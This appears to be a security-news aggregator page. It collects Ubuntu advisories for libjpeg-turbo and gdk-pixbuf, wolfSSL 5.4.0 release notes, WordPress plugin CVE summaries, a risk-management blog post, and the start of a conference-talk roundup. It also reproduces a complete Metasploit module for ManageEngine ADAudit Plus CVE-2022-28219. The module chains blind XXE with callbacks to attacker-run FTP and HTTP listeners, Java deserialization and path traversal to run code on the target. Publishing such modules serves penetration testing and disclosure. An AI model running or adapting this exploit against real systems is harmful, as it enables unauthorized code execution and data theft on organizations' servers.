Ubuntu Security Notice 5553-1 - It was discovered that libjpeg-turbo was not properly handling EOF characters, which could lead to excessive memory consumption through the execution of a large loop. An attacker could possibly use this issue to cause a denial of service. It was discovered that libjpeg-turbo was not properly performing bounds check operations, which could lead to a heap-based buffer overread. If a user or automated system were tricked into opening a specially crafted file, an attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 14.04 ESM.

    ==========================================================================Ubuntu Security Notice USN-5553-1August 08, 2022libjpeg-turbo vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:Several security issues were fixed in libjpeg-turbo.Software Description:- libjpeg-turbo: library for handling JPEG filesDetails:It was discovered that libjpeg-turbo was not properly handling EOF characters,which could lead to excessive memory consumption through the execution of alarge loop. An attacker could possibly use this issue to cause a denial ofservice. (CVE-2018-11813)It was discovered that libjpeg-turbo was not properly performing boundscheck operations, which could lead to a heap-based buffer overread. If a useror automated system were tricked into opening a specially crafted file, anattacker could possibly use this issue to cause a denial of service. Thisissue only affected Ubuntu 14.04 ESM. (CVE-2018-14498)It was discovered that libjpeg-turbo was not properly limiting the amount ofmain memory being consumed by the system during decompression or multi-passcompression operations, which could lead to excessive memory consumption. Anattacker could possibly use this issue to cause a denial of service.(CVE-2020-14152)It was discovered that libjpeg-turbo was not properly setting variable sizeswhen performing certain kinds of encoding operations, which could lead to astack-based buffer overflow. If a user or automated system were tricked intoopening a specially crafted file, an attacker could possibly use this issue tocause a denial of service. (CVE-2020-17541)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   libjpeg-turbo-progs             1.4.2-0ubuntu3.4+esm1   libjpeg-turbo-test              1.4.2-0ubuntu3.4+esm1   libjpeg-turbo8                  1.4.2-0ubuntu3.4+esm1   libturbojpeg                    1.4.2-0ubuntu3.4+esm1Ubuntu 14.04 ESM:   libjpeg-turbo-progs             1.3.0-0ubuntu2.1+esm2   libjpeg-turbo-test              1.3.0-0ubuntu2.1+esm2   libjpeg-turbo8                  1.3.0-0ubuntu2.1+esm2   libturbojpeg                    1.3.0-0ubuntu2.1+esm2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5553-1   CVE-2018-11813, CVE-2018-14498, CVE-2020-14152, CVE-2020-17541

Ubuntu Security Notice USN-5553-1

Ubuntu Security Notice 5554-1 - Pedro Ribeiro discovered that the GDK-PixBuf library did not properly handle certain GIF images. If an user or automated system were tricked into opening a specially crafted GIF file, a remote attacker could use this flaw to cause GDK-PixBuf to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5554-1August 08, 2022gdk-pixbuf vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:GDK-PixBuf could be made to crash or run programs as your login if itopened a specially crafted file.Software Description:- gdk-pixbuf: GDK Pixbuf libraryDetails:Pedro Ribeiro discovered that the GDK-PixBuf library did not properlyhandle certain GIF images. If an user or automated system were tricked intoopening a specially crafted GIF file, a remote attacker could use this flawto cause GDK-PixBuf to crash, resulting in a denial of service, or possiblyexecute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  libgdk-pixbuf2.0-0              2.40.0+dfsg-3ubuntu0.3After a standard system update you need to restart your session to make allthe necessary changes.References:  https://ubuntu.com/security/notices/USN-5554-1  CVE-2021-46829Package Information:  https://launchpad.net/ubuntu/+source/gdk-pixbuf/2.40.0+dfsg-3ubuntu0.3

Ubuntu Security Notice USN-5554-1

This Metasploit module exploits CVE-2022-28219, which is a pair of vulnerabilities in ManageEngine ADAudit Plus versions before build 7060. They include a path traversal in the /cewolf endpoint along with a blind XML external entity injection vulnerability to upload and execute a file.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::Remote::TcpServer  include Msf::Exploit::CmdStager  include Msf::Exploit::JavaDeserialization  include Msf::Handler::Reverse::Comm  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ManageEngine ADAudit Plus CVE-2022-28219',        'Description' => %q{          This module exploits CVE-2022-28219, which is a pair of          vulnerabilities in ManageEngine ADAudit Plus versions before build          7060: a path traversal in the /cewolf endpoint, and a blind XXE in,          to upload and execute an executable file.        },        'Author' => [          'Naveen Sunkavally', # Initial PoC + disclosure          'Ron Bowes', # Analysis and module        ],        'References' => [          ['CVE', '2022-28219'],          ['URL', 'https://www.horizon3.ai/red-team-blog-cve-2022-28219/'],          ['URL', 'https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219/rapid7-analysis'],          ['URL', 'https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html'],        ],        'DisclosureDate' => '2022-06-29',        'License' => MSF_LICENSE,        'Platform' => 'win',        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Platform' => 'win'            }          ],        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8081        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('TARGETURI_DESERIALIZATION', [true, 'Path traversal and unsafe deserialization endpoint', '/cewolf/logo.png']),      OptString.new('TARGETURI_XXE', [true, 'XXE endpoint', '/api/agent/tabs/agentData']),      OptString.new('DOMAIN', [true, 'Active Directory domain that the target monitors', nil]),      OptInt.new('SRVPORT_FTP', [true, 'Port for FTP reverse connection', 2121]),      OptInt.new('SRVPORT_HTTP2', [true, 'Port for additional HTTP reverse connections', 8888]),    ])    register_advanced_options([      OptInt.new('PATH_TRAVERSAL_DEPTH', [true, 'The number of `../` to prepend to the path traversal attempt', 20]),      OptInt.new('FtpCallbackTimeout', [true, 'The amount of time, in seconds, the FTP server will wait for a reverse connection', 5]),      OptInt.new('HttpUploadTimeout', [true, 'The amount of time, in seconds, the HTTP file-upload server will wait for a reverse connection', 5]),    ])  end  def srv_host    if ((datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::'))      return datastore['URIHOST'] || Rex::Socket.source_address(rhost)    end    return datastore['SRVHOST']  end  def check    # Make sure it's ADAudit Plus by requesting the root and checking the title    res1 = send_request_cgi(      'method' => 'GET',      'uri' => '/'    )    unless res1      return CheckCode::Unknown('Target failed to respond to check.')    end    unless res1.code == 200 && res1.body.match?(/<title>ADAudit Plus/)      return CheckCode::Safe('Does not appear to be ADAudit Plus')    end    # Check if it's a vulnerable version (the patch removes the /cewolf endpoint    # entirely)    res2 = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri("#{datastore['TARGETURI_DESERIALIZATION']}?img=abc")    )    unless res2      return CheckCode::Unknown('Target failed to respond to check.')    end    unless res2.code == 200      return CheckCode::Safe('Target does not have vulnerable endpoint (likely patched).')    end    CheckCode::Vulnerable('The vulnerable endpoint responds with HTTP/200.')  end  def exploit    # List the /users folder - this is good to do first, since we can fail early    # if something isn't working    vprint_status('Attempting to exploit XXE to get a list of users')    users = get_directory_listing('/users')    unless users      fail_with(Failure::NotVulnerable, 'Failed to get a list of users (check your DOMAIN, or server may not be vulnerable)')    end    # Remove common users    users -= ['Default', 'Default User', 'All Users', 'desktop.ini', 'Public']    if users.empty?      fail_with(Failure::NotFound, 'Failed to find any non-default user accounts')    end    print_status("User accounts discovered: #{users.join(', ')}")    # I can't figure out how to properly encode spaces, but using the 8.3    # version works! This converts them    users.map do |u|      if u.include?(' ')        u = u.gsub(/ /, '')[0..6].upcase + '~1'      end      u    end    # Check the filesystem for existing payloads that we should ignore    vprint_status('Enumerating old payloads cached on the server (to skip later)')    existing_payloads = search_for_payloads(users)    # Create a serialized payload    begin      # Create a queue so we can detect when the payload is delivered      queue = Queue.new      # Upload payload to remote server      # (this spawns a thread we need to clean up)      print_status('Attempting to exploit XXE to store our serialized payload on the server')      t = upload_payload(generate_java_deserialization_for_payload('CommonsBeanutils1', payload), queue)      # Wait for something to arrive in the queue (basically using it as a      # semaphor      vprint_status('Waiting for the payload to be sent to the target')      queue.pop # We don't need the result      # Get a list of possible payloads (never returns nil)      vprint_status("Trying to find our payload in all users' temp folders")      possible_payloads = search_for_payloads(users)      possible_payloads -= existing_payloads      # Make sure the payload exists      if possible_payloads.empty?        fail_with(Failure::Unknown, 'Exploit appeared to work, but could not find the payload on the target')      end      # If multiple payloads appeared, abort for safety      if possible_payloads.length > 1        fail_with(Failure::UnexpectedReply, "Found #{possible_payloads.length} apparent payloads in temp folders - aborting!")      end      # Execute the one payload      payload_path = possible_payloads.pop      print_status("Triggering payload: #{payload_path}...")      res = send_request_cgi(        'method' => 'GET',        'uri' => "#{datastore['TARGETURI_DESERIALIZATION']}?img=#{'/..' * datastore['PATH_TRAVERSAL_DEPTH']}#{payload_path}"      )      if res&.code != 200        fail_with(Failure::Unknown, "Path traversal request failed with HTTP/#{res&.code}")      end    ensure      # Kill the upload thread      if t        begin          t.kill        rescue StandardError          # Do nothing if we fail to kill the thread        end      end    end  end  def get_directory_listing(folder)    print_status("Getting directory listing for #{folder} via XXE and FTP")    # Generate a unique callback URL    path = "/#{rand_text_alpha(rand(8..15))}.dtd"    full_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{path}"    # Send the username anonymous and no password so the server doesn't log in    # with the password "Java1.8.0_51@" which is detectable    # We use `end_tag` at the end so we can detect when the listing is over    end_tag = rand_text_alpha(rand(8..15))    ftp_url = "ftp://anonymous:password@#{srv_host}:#{datastore['SRVPORT_FTP']}/%file;#{end_tag}"    serve_http_file(path, "<!ENTITY % all \"<!ENTITY send SYSTEM '#{ftp_url}'>\"> %all;")    # Start a server to handle the reverse FTP connection    ftp_server = Rex::Socket::TcpServer.create(      'LocalPort' => datastore['SRVPORT_FTP'],      'LocalHost' => datastore['SRVHOST'],      'Comm' => select_comm,      'Context' => {        'Msf' => framework,        'MsfExploit' => self      }    )    # Trigger the XXE to get file listings    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI_XXE']).to_s,      'ctype' => 'application/json',      'data' => create_json_request("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % file SYSTEM \"file:#{folder}\"><!ENTITY % start \"<![CDATA[\"><!ENTITY % end \"]]>\"><!ENTITY % dtd SYSTEM \"#{full_url}\"> %dtd;]><data>&send;</data>")    )    if res&.code != 200      fail_with(Failure::Unknown, "XXE request to get directory listing failed with HTTP/#{res&.code}")    end    ftp_client = nil    begin      # Wait for a connection with a timeout      select_result = ::IO.select([ftp_server], nil, nil, datastore['FtpCallbackTimeout'])      unless select_result && !select_result.empty?        print_warning("FTP reverse connection for directory enumeration failed - #{ftp_url}")        return nil      end      # Accept the connection      ftp_client = ftp_server.accept      # Print a standard banner      ftp_client.print("220 Microsoft FTP Service\r\n")      # We need to flip this so we can get a directory listing over multiple packets      directory_listing = nil      loop do        select_result = ::IO.select([ftp_client], nil, nil, datastore['FtpCallbackTimeout'])        # Check if we ran out of data        if !select_result || select_result.empty?          # If we got nothing, we're sad          if directory_listing.nil? || directory_listing.empty?            print_warning('Did not receive data from our reverse FTP connection')            return nil          end          # If we have data, we're happy and can break          break        end        # Receive the data that's waiting        data = ftp_client.recv(256)        if data.empty?          # If we got nothing, we're done receiving          break        end        # Match behavior with ftp://test.rebex.net        if data =~ /^USER ([a-zA-Z0-9_.-]*)/          ftp_client.print("331 Password required for #{Regexp.last_match(1)}.\r\n")        elsif data =~ /^PASS /          ftp_client.print("230 User logged in.\r\n")        elsif data =~ /^TYPE ([a-zA-Z0-9_.-]*)/          ftp_client.print("200 Type set to #{Regexp.last_match(1)}.\r\n")        elsif data =~ /^EPSV ALL/          ftp_client.print("200 ESPV command successful.\r\n")        elsif data =~ /^EPSV/ # (no space)          ftp_client.print("229 Entering Extended Passive Mode(|||#{rand(1025..1100)})\r\n")        elsif data =~ /^RETR (.*)/m          # Store the start of the listing          directory_listing = Regexp.last_match(1)        else          # Have we started receiving data?          # (Disable Rubocop, because I think it's way more confusing to          # continue the elsif train)          if directory_listing.nil? # rubocop:disable Style/IfInsideElse            # We shouldn't really get here, but if we do, just play dumb and            # keep the client talking            ftp_client.print("230 User logged in.\r\n")          else            # If we're receiving data, just append            directory_listing.concat(data)          end        end        # Break when we get the PORT command (this is faster than timing out,        # but doesn't always seem to work)        if !directory_listing.nil? && directory_listing =~ /(.*)#{end_tag}/m          directory_listing = Regexp.last_match(1)          break        end      end    ensure      ftp_server.close      if ftp_client        ftp_client.close      end    end    # Handle FTP errors (which thankfully aren't as common as they used to be)    unless ftp_client      print_warning("Didn't receive expected FTP connection")      return nil    end    if directory_listing.nil? || directory_listing.empty?      vprint_warning('FTP client connected, but we did not receive any data over the socket')      return nil    end    # Remove PORT commands, split at \r\n or \n, and remove empty elements    directory_listing.gsub(/PORT [0-9,]+[\r\n]/m, '').split(/\r?\n/).reject(&:empty?)  end  def search_for_payloads(users)    return users.flat_map do |u|      dir = "/users/#{u}/appdata/local/temp"      # This will search for the payload, but right now just print stuff      listing = get_directory_listing(dir)      unless listing        vprint_warning("Couldn't get directory listing for #{dir}")        next []      end      listing           .select { |f| f =~ /^jar_cache[0-9]+.tmp$/ }           .map { |f| File.join(dir, f) }    end  end  def upload_payload(payload, queue)    t = framework.threads.spawn('adaudit-payload-deliverer', false) do      c = nil      begin        # We use a TCP socket here so we can hold the socket open after the HTTP        # conversation has concluded. That way, the server caches the file in        # the user's temp folder while it waits for more data        http_server = Rex::Socket::TcpServer.create(          'LocalPort' => datastore['SRVPORT_HTTP2'],          'LocalHost' => srv_host,          'Comm' => select_comm,          'Context' => {            'Msf' => framework,            'MsfExploit' => self          }        )        # Wait for the reverse connection, with a timeout        select_result = ::IO.select([http_server], nil, nil, datastore['HttpUploadTimeout'])        unless select_result && !select_result.empty?          fail_with(Failure::Unknown, "XXE request to upload file did not receive a reverse connection on #{datastore['SRVPORT_HTTP2']}")        end        # Receive and discard the HTTP request        c = http_server.accept        c.recv(1024)        c.print "HTTP/1.1 200 OK\r\n"        c.print "Connection: keep-alive\r\n"        c.print "\r\n"        c.print payload        # This will notify the other thread that something has arrived        queue.push(true)        # This has to stay open as long as it takes to enumerate all users'        # directories to find then execute the payload. ~5 seconds works on        # a single-user system, but I increased this a lot for production.        # (This thread should be killed when the exploit completes in any case)        Rex.sleep(60)      ensure        http_server.close        if c          c.close        end      end    end    # Trigger the XXE to get file listings    path = "/#{rand_text_alpha(rand(8..15))}.jar!/file.txt"    full_url = "http://#{srv_host}:#{datastore['SRVPORT_HTTP2']}#{path}"    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI_XXE']).to_s,      'ctype' => 'application/json',      'data' => create_json_request("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % xxe SYSTEM \"jar:#{full_url}\"> %xxe;]>")    )    if res&.code != 200      fail_with(Failure::Unknown, "XXE request to upload payload failed with HTTP/#{res&.code}")    end    return t  end  def serve_http_file(path, respond_with = '')    # do not use SSL for the attacking web server    if datastore['SSL']      ssl_restore = true      datastore['SSL'] = false    end    start_service({      'Uri' => {        'Proc' => proc do |cli, _req|          send_response(cli, respond_with)        end,        'Path' => path      }    })    datastore['SSL'] = true if ssl_restore  end  def create_json_request(xml_payload)    [      {        'DomainName' => datastore['domain'],        'EventCode' => 4688,        'EventType' => 0,        'TimeGenerated' => 0,        'Task Content' => xml_payload      }    ].to_json  endend

ManageEngine ADAudit Plus Path Traversal / XML Injection

wolfSSL before 5.4.0 allows remote attackers to cause a denial of service via DTLS because a check for return-routability can be skipped.

Note:  
\*\* Future releases of wolfSSL will turn off TLS 1.1 by default  
\*\* Release 5.4.0 made SP math the default math implementation. To make an equivalent build as –disable-fastmath from previous versions of wolfSSL, now requires using the configure option –enable-heapmath instead.

Release 5.4.0 of wolfSSL embedded TLS has bug fixes and new features including:

**Vulnerabilities**

*   \[High\] Potential for DTLS DoS attack. In wolfSSL versions before 5.4.0 the return-routability check is wrongly skipped in a specific edge case. The check on the return-routability is there for stopping attacks that either consume excessive resources on the server, or try to use the server as an amplifier sending an excessive amount of messages to a victim IP. If using DTLS 1.0/1.2 on the server side users should update to avoid the potential DoS attack. CVE-2022-34293
*   \[Medium\] Ciphertext side channel attack on ECC and DH operations. Users on systems where rogue agents can monitor memory use should update the version of wolfSSL and change private ECC keys. Thanks to Sen Deng from Southern University of Science and Technology (SUSTech) for the report.
*   \[Medium\] Public disclosure of a side channel vulnerability that has been fixed since wolfSSL version 5.1.0. When running on AMD there is the potential to leak private key information with ECDSA operations due to a ciphertext side channel attack. Users on AMD doing ECDSA operations with wolfSSL versions less than 5.1.0 should update their wolfSSL version used. Thanks to professor Yinqian Zhang from Southern University of Science and Technology (SUSTech), his Ph.D. student Mengyuan Li from The Ohio State University, and his M.S students Sen Deng and Yining Tang from SUStech along with other collaborators; Luca Wilke, Jan Wichelmann and Professor Thomas Eisenbarth from the University of Lubeck, Professor Shuai Wang from Hong Kong University of Science and Technology, Professor Radu Teodorescu from The Ohio State University, Huibo Wang, Kang Li and Yueqiang Cheng from Baidu Security and Shoumeng Yang from Ant Financial Services Group.  
    CVE-2020-12966 https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1013 CVE-2021-46744 https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1033

**New Feature Additions****DTLS 1.3**

*   Support for using the new DTLSv1.3 protocol was added
*   Enhancements to bundled examples for an event driven server with DTLS 1.3 was added

**Ports**

*   Update for the version of VxWorks supported, adding in support for version 6.x
*   Support for new DPP and EAP-TEAP/EAP-FAST in wpa\_supplicant
*   Update for TSIP version support, adding support for version 1.15 for RX65N and RX72N
*   Improved TSIP build to handle having the options WOLFSSL\_AEAD\_ONLY defined or NO\_AES\_CBC defined
*   Added support for offloading TLS1.3 operations to Renesas RX boards with TSIP

**Misc.**

*   Constant time improvements due to development of new constant time tests
*   Initial translation of API headers to Japanese and expansion of Japanese help message support in example applications
*   Add support for some FPKI (Federal PKI) certificate cases, UUID, FASC-N, PIV extension for use with smart cards
*   Add support for parsing additional CSR attributes such as unstructured name and content type
*   Add support for Linux getrandom() when defining the macro WOLFSSL\_GETRANDOM
*   Add TLS 1.2 ciphersuite ECDHE\_PSK\_WITH\_AES\_128\_GCM\_SHA256 from RFC 8442
*   Expand CAAM support with QNX to include i.MX8 boards and add AES-CTR support
*   Enhanced glitching protection by hardening the TLS encrypt operations

**Math and Performance****SP Math Additions**

*   Support for ARMv3, ARMv6 and ARMv7a
    *   Changes and improvements to get SP building for armv7-a
    *   Updated assembly for moving large immediate values on ARMv6
    *   Support for architectures with no ldrd/strd and clz
*   Reworked generation using common asm ruby code for 32bit ARM
*   Enable wolfSSL SP math all by default (sp\_int.c)
*   Update SP math all to not use sp\_int\_word when SQR\_MUL\_ASM is available

**SP Math Fixes**

*   Fixes for constant time with div function
*   Fix casting warnings for Windows builds and assembly changes to support XMM6-15 being non-volatile
*   Fix for div\_word when not using div function
*   Fixes for user settings with SP ASM and ED/Curve25519 small
*   Additional Wycheproof tests ran and fixes
*   Fix for SP math ECC non-blocking to always check hashLen
*   Fix for SP math handling edge case with submod

**Improvements and Optimizations****Compatibility Layer**

*   Provide access to "Finished" messages outside of compatibility layer builds
*   Remove unneeded FIPS guard on wolfSSL\_EVP\_PKEY\_derive
*   Fix control command issues with AES-GCM, control command EVP\_CTRL\_GCM\_IV\_GEN
*   Add support for importing private only EC key to a WOLFSSL\_EVP\_PKEY struct
*   Add support for more extensions to wolfSSL\_X509\_print\_ex
*   Update for internal to DER (i2d) AIPs to move the buffer pointer when passed in and the operation is successful
*   Return subject and issuer X509\_NAME object even when not set

**Ports**

*   Renesas RA6M4 example update and fixes
*   Support multi-threaded use cases with Renesas SCE protected mode and TSIP
*   Add a global variable for heap-hint for use with TSIP
*   Changes to support v5.3.0 cube pack for STM32
*   Use the correct mutex type for embOS
*   ESP-IDF build cleanup and enhancements, adding in note regarding ESP-IDF Version
*   Support for SEGGER embOS and emNET
*   Fix to handle WOLFSSL\_DTLS macro in Micrium build

**Build Options**

*   Support for verify only and no-PSS builds updated
*   Add the enable options wolfssh (mapped to the existing –enable-ssh)
*   Remove WOLFSSL\_ALT\_NAMES restriction on notBefore/notAfter use in Cert struct
*   Move several more definitions outside the BUILDING\_WOLFSSL gate with linux kernel module build
*   Modify --enable-openssh to not enable non-FIPS algos for FIPS builds
*   Remove the Python wrappers from wolfSSL source (use pip install instead of using wolfSSL with Python and our separate Python repository)
*   Add --enable-openldap option to configure.ac for building the OpenLDAP port
*   Resolve DTLS build to handle not having –enable-hrrcookie when not needed
*   Add an --enable-strongswan option to configure.ac for building the Strongswan port
*   Improve defaults for 64-bit BSDs in configure
*   Crypto only build can now be used openssl extra
*   Update ASN template build to properly handle WOLFSSL\_CERT\_EXT and HAVE\_OID\_ENCODING
*   Allow using 3DES and MD5 with FIPS 140-3, as they fall outside of the FIPS boundary
*   Add the build option --enable-dh=const which replaces setting the macro WOLFSSL\_DH\_CONST and now conditionally link to -lm as needed
*   Add the macro WOLFSSL\_HOSTNAME\_VERIFY\_ALT\_NAME\_ONLY which is used to verify hostname/ip address using alternate name (SAN) only and does not use the common name
*   WOLFSSL\_DTLS\_NO\_HVR\_ON\_RESUME macro added (off by default to favor more security). If defined, a DTLS server will not do a cookie exchange on successful client resumption: the resumption will be faster (one RTT less) and will consume less bandwidth (one ClientHello and one HelloVerifyRequest less). On the other hand, if a valid SessionID is collected, forged clientHello messages will consume resources on the server.
*   Misc.
*   Refactoring of some internal TLS functions to reduce the memory usage
*   Make old less secure TimingPadVerify implementation available
*   Add support for aligned data with clang LLVM
*   Remove subject/issuer email from the list of alt. Email names in the DecodedCerts struct
*   Zeroizing of pre-master secret buffer in TLS 1.3
*   Update to allow TLS 1.3 application server to send session ticket
*   Improve the sniffer asynchronous test case to support multiple concurrent streams
*   Clean up wolfSSL\_clear() and add more logging
*   Update to not error out on bad CRL next date if using NO\_VERIFY when parsing
*   Add an example C# PSK client
*   Add ESP-IDF WOLFSSL\_ESP8266 setting for ESP8266 devices
*   Support longer sigalg list for post quantum use cases and inter-op with OQS's OpenSSL fork
*   Improve AES-GCM word implementation of GMULT to be constant time
*   Additional sanity check with Ed25519/Ed448, now defaults to assume public key is not trusted
*   Support PSK ciphersuites in benchmark apps
*   FIPS in core hash using SHA2-256 and SHA2-384
*   Add ability to store issuer name components when parsing a certificate
*   Make the critical extension flags in DecodedCert always available
*   Updates to the default values for basic constraint with X509’s
*   Support using RSA OAEP with no malloc and add additional sanity checks
*   Leverage async code paths to support WANT\_WRITE while sending packet fragments
*   New azsphere example for continuous integration testing
*   Update RSA key generation function to handle pairwise consistency tests with static memory pools used
*   Resolve build time warning by passing in and checking output length with internal SetCurve function
*   Support DTLS bidirectional shutdown in the examples
*   Improve DTLS version negotiation and downgrade capability

**General Fixes**

*   Fixes for STM32 Hash/PKA, add some missing mutex frees, and add an additional benchmark
*   Fix missing return checks in KSDK ED25519 code
*   Fix compilation warnings from IAR
*   Fixes for STM32U5/H7 hash/crypto support
*   Fix for using track memory feature with FreeRTOS
*   Fixup XSTR processing for MICRIUM
*   Update Zephyr fs.h path
*   DTLS fixes with WANT\_WRITE simulations
*   Fixes for BER use with PKCS7 to have additional sanity checks and guards on edge cases
*   Fix to handle exceptional edge case with TFM mp\_exptmod\_ex
*   Fix for stack and heap measurements of a 32-bit build
*   Fix to allow enabling AES key wrap (direct) with KCAPI
*   Fix --enable-openssh FIPS detection syntax in configure.ac
*   Fix to move wolfSSL\_ERR\_clear\_error outside gate for OPENSSL\_EXTRA
*   Remove MCAPI project's dependency on zlib version
*   Only use \_\_builtin\_offset on supported GCC versions (4+)
*   Fix for c89 builds with using WOLF\_C89
*   Fix 64bit postfix for constants building with powerpc
*   Fixed async Sniffer with TLS v1.3, async removal of WC_HW_WAIT_E and sanitize leak
*   Fix for QAT ECC to gate use of HW based on marker
*   Fix the supported version extension to always check minDowngrade
*   Fix for TLS v1.1 length sanity check for large messages
*   Fixes for loading a long DER/ASN.1 certificate chain
*   Fix to expose the RSA public DER export functions with certgen
*   Fixes for building with small version of SHA3
*   Fix configure with WOLFSSL\_WPAS\_SMALL
*   Fix to free PKCS7 recipient list in error cases
*   Sanity check to confirm ssl->hsHashes is not NULL before attempting to dereference it
*   Clear the leftover byte count in Aes struct when setting IV

For additional vulnerability information visit the vulnerability page at:  
https://www.wolfssl.com/docs/security-vulnerabilities/

See INSTALL file for build instructions.  
More info can be found on-line at: https://wolfssl.com/wolfSSL/Docs.html

CVE-2022-34293: Release wolfSSL Release 5.4.0 (July 11, 2022) · wolfSSL/wolfssl

The WPDating WordPress plugin through 7.1.9 does not properly escape user input before concatenating it to certain SQL queries, leading to multiple SQL injection vulnerabilities.

CVE-2022-2460

The Rough Chart WordPress plugin through 1.0.0 does not properly escape chart data label, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

CVE-2022-2409

A new workout leads to five smart lessons about the importance of converging security and fraud into a unified risk function.

Recently, I found inspiration in a set of adjustable dumbbells. I purchased these dumbbells in an effort to get into better shape. When they arrived, I found the four weight-adjusting mechanisms to be very intuitive and easy to use. I was soon on my way to a bit of strength training.

There was only one complication. A few days into using the dumbbells, I found that one of the four mechanisms wasn't quite working properly. In an effort to troubleshoot the issue, I tried a few different things — a trial and error of sorts. It took a few iterations — trying different combinations of placing the adjustable dumbbells in their holders in different orientations, along with swapping the dumbbells.

At last, having visibility into both the dumbbells and their holders, I isolated the issue. A small metal tab on the holder that presses on a piece on the dumbbell that releases the lock was slightly bent. Thus, it was not releasing the lock properly, which prevented me from adjusting the weight on the dumbbell. Once isolated, it was a quick and easy fix — I bent the small tab ever so slightly so that it released the lock properly.

You might be asking yourself what this story has to do with security and fraud. Allow me to share with you the lesson I learned from this: the importance of the convergence of security and fraud.

Just as I could not have troubleshot the dumbbell issue without having visibility into both the dumbbells and their holders, enterprises cannot properly manage risk without having a converged view into both security and fraud. In other words, enterprises must have a unified view of risk, across security and fraud.

**5 Ways Combining Security and Fraud Reduces Risk**

To help illustrate the importance of a converged risk program, let's take a look at five ways in which security and fraud work together to reduce risk across the enterprise:

**1\. Shattering silos:** Effectively managing risk across an enterprise requires teamwork across a variety of groups and functions. Combining security and fraud under a converged risk umbrella sends a signal that everyone is on the same team and working toward the same goals. It also sends the message that silos and the turf wars, politics, and inefficiencies they bring have no place in the enterprise.

**2\. Less biased risk metrics:** Most enterprises maintain a risk register and regularly review, evaluate, and audit both inherent and residual risk. Risks are assigned to different groups within the enterprise, and the management, monitoring, and mitigation of those risks is delegated to those groups. Sounds logical, right? The problem is that there isn't a perfect 1:1 mapping here. As a result, there is overlap — some risks wind up assigned and delegated to multiple groups. Thus begins the double (or multiple) counting of exposure, which translates to inaccurate and biased risk metrics. While combining risk and fraud will not eliminate this problem entirely, it will help reduce the bias of risk metrics.

**3\. Better monitoring:** As you can imagine, visibility into what is happening across the enterprise on the network, within applications, and in cloud environments is critical to proper security and fraud monitoring. There are many other important factors, of course, though visibility is one of several very important ones. When kept separate, security and fraud will naturally develop their own technology stacks. They will have different visibility across the enterprise, different risks they are concerned about, different skill sets developing alerting and eventing content, and different processes and procedures. But what happens when a threat actor jumps from one monitoring silo to another? Chances are that neither group will be able to piece together the bigger picture, and that introduces risk. Combining security and fraud reduces the risk of this happening and facilitates improved monitoring across the enterprise.

**4\. More complete investigation:** When security and fraud are converged, not only is monitoring improved, but so is investigation. In the event that there is a security or fraud incident, analysts (whether their expertise is security, fraud, or both) will need to query and analyze data from a wide variety of sources. When security and fraud are siloed, this is more complex than it needs to be. A converged risk function, on the other hand, should ideally have access to all of the requisite visibility in order to properly and fully investigate the incident.

**5\. More efficient response:** Given that a large amount of fraud happens in digital channels, the line between areas of responsibility for security and fraud is blurred to begin with. And that's all the more so when it comes time to respond to a potential incident. Coordination and collaboration is required across security, fraud, IT, and other areas of the business. Having security and fraud converged at the outset makes the response more efficient and smooth. If multiple responses are going on at the same time, those efficiency gains can really begin to add up.

Strategic thinking, determination, and resources are required to converge security and fraud. It is a worthwhile investment, however, that pays immediate dividends. Converging security and fraud into a unified risk function enables and empowers enterprises to more efficiently and effectively mitigate risk.

What Adjustable Dumbbells Can Teach Us About Risk Management

Pwn stars

Hacker Summer Camp is only days away, so in order to whet your appetite, The Daily Swig has compiled a list of some of the best talks of years past.

Over the years there’s been thrills, spills, and (of course) ‘sploits, as the top researchers in the security world have descended on Las Vegas for Black Hat USA and DEF CON – a security double bill that’s hard to beat.

This year’s Black Hat – which is again taking place as a hybrid event – and DEF CON offerings are sure to add to the already impressive roster of ground-breaking talks from years gone by.

Now that Covid-related restrictions have largely been lifted, the 2022 edition promises to be something of a grand reopening of arguably the single most important event in the infosec calendar.

Without further ado (and in no particular order) here are our top picks from past Black Hat and DEF CON events…

**Panic in the Cisco**

Michael Lunn’s 2005 talk on the security shortcomings of Cisco’s networking technology was important not only because of the potential impact of his discovery, but because it served as an example of an attempt to suppress security research.

Lunn resigned from his employment with Internet Security Systems in order to deliver a talk on a critical vulnerability in router technology from Cisco.

The security researcher demonstrated an exploit – which opened the door to a range of attacks from eavesdropping to disabling the compromised device – while withholding any details. Cisco issued a security fix to its firmware prior to the talk, but not many organizations had applied it by the time it rolled around.

